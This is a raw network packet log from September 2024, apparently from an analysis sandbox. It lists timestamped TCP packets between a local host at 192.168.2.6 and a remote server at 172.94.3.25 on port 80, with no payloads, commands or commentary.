                                        Sep 25, 2024 18:40:29.932033062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932071924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932085991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932135105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932168007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932174921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932200909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932239056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932250977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932284117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932316065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932327032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932349920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932382107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932391882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932415009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932449102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932457924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932482004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932521105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932538033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932569981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932602882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932612896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932652950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932684898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932692051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932718039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932750940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932761908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932846069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932879925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932885885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932912111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932945013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932951927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932976961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933015108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933028936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933060884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933094025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933100939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933125019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933159113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933167934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933191061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933223009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933233023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933259964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933293104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933303118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933325052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933357954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933368921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933391094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933423996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933433056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933456898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933490992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933501959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933522940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933561087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933573008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933604956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933638096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933650017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933670998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933703899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933707952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933737040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933773994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933784962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933818102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933850050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933856010 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933881044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933917999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933926105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933948994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933981895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933986902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934015989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934047937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934057951 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934079885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934112072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934117079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934144974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934178114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934190989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934209108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934241056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934253931 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934273958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934305906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934318066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934338093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934370995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934380054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934405088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934442997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934448957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934475899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934508085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934520960 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934559107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934591055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934596062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934623957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934655905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934667110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934705019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934745073 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934753895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934787035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934818983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934829950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934851885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934885025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934895992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934916973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934948921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934959888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934997082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935025930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935031891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935067892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935101032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935106039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935133934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935165882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935178995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935198069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935230017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935241938 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935261965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935292959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935305119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935326099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935359001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935369015 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935424089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935460091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935463905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935492039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935528994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935542107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935575008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935607910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935616016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935642004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935684919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935691118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935724974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935765028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935767889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935798883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935833931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935837984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935866117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935899019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935904980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935930014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935961962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935975075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936012030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936044931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936053991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936077118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936110020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936115026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936141968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936175108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936181068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936208010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936239958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936273098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936295033 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936305046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936312914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936337948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936373949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936382055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936405897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936438084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936439991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936490059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936531067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936541080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936573982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936613083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936623096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936655045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936688900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936696053 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936719894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936753035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936765909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936784983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936816931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936826944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936866045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936897993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936903954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936929941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936963081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936974049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936995029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937026978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937038898 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937062979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937093973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937099934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937127113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937158108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937170982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937191963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937223911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937236071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937256098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937289000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937299013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937321901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937355042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937380075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937387943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937429905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937439919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937473059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937505007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937510967 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937537909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937571049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937575102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937621117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937654018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148211956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148232937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148235083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148245096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148252964 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148257971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148268938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148281097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148308992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148310900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148319960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148333073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148350954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148462057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148473024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148483038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148499966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148513079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148519993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148525000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148535967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148545027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148547888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148561001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.148587942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.148610115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.356106043 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362185955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362212896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362225056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362303972 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362344980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362355947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362366915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362380028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362391949 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362409115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362481117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362492085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362509012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362520933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362529993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362531900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362554073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362557888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362565994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362574100 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362576962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362590075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362607002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362632036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362642050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362653017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362664938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362678051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362699032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362731934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362838984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362850904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362863064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362874985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362880945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362886906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362898111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362904072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362910032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362921000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362932920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.362937927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.362951994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363105059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363116026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363126993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363138914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363146067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363149881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363162041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363171101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363188982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363431931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363470078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363495111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363507032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363519907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363538980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363636971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363647938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363660097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363671064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363677979 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363683939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363697052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363708019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363727093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363781929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363801956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363814116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363820076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363825083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363837004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363847971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.363848925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363859892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.363871098 CEST8049716172.94.3.25192.168.2.6
